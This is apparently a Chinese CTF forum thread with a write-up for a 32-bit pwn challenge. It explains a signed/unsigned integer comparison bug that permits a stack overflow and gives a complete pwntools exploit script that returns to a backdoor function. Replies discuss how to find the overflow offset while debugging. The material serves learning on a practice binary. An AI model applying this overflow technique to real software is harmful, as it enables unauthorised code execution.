xuenixiang_2020_pwn_pwn6

roger

[md]- 首先程序是个比较简单的32位elf，是个猜数字游戏


- 漏洞点在read_name函数有个整数溢出，v2为有符号数，而for循环中i为无符号数，所以当有符号数与无符号数比较时，会将有符号数强制转换成无符号数，当输入-1时，v2在比较中就变成了最大的正数，因此可以栈溢出


- 程序正好有个后门，直接栈溢出执行后门即可得到flag



- exp

```
from pwn import *

context.log_level = 'debug'

#p = process('./f4n_pwn')
p = remote('127.0.0.1',9999)

p.recvuntil('length : ')
p.sendline('-1')
payload = 'a'*0x57 + p32(0x080486BB)
p.recvuntil('name : \n')
p.sendline(payload)

p.interactive()
```[/md]
源码如下：

游客，如果您要查看本帖隐藏内容请回复

xiaofei0115

老师，我在GDB中输入-1以后 输入全a或者全b都可以实现溢出，但是输入cyclic 200 的字符串发现并没有栈溢出程序能够正常运行，非常奇怪。

xiaofei0115

没有溢出成功

溢出成功

roger

xiaofei0115 发表于 2020-5-26 16:36

没懂你意思，再描述清楚点

roger

xiaofei0115 发表于 2020-5-26 16:36

但是输入cyclic 200 的字符串发现并没有栈溢出程序能够正常运行  这句话我没读懂

roger

roger 发表于 2020-5-26 18:07
但是输入cyclic 200 的字符串发现并没有栈溢出程序能够正常运行  这句话我没读懂 ...

你的意思是不是没有溢出？具体情况具体分析吧，你自己调试一下找找原因

xiaofei0115

经过晚上调式发现这题的几个有意思的地方。第一个这题除了整数溢出以外还有数组溢出。name哪里其实是一个数组的溢出导致的。第二个算这个偏移有点意思，用原有的cyclic 200程序直接截断正常运行，没有达到溢出效果。如果全a或者全b是都可以的。也不知道问题在哪里。但是可以通过gdb调式堆出偏移位0x57

roger

xiaofei0115 发表于 2020-5-26 23:01
经过晚上调式发现这题的几个有意思的地方。第一个这题除了整数溢出以外还有数组溢出。name哪里其实是一个数 ...

那就足够了…不需要过于纠结那些细节，影响学习进度，可以先往后推进，可能某一天这个问题就迎刃而解了

zhouruijie

第一次做这种 看一下解答

snorlax

学习一下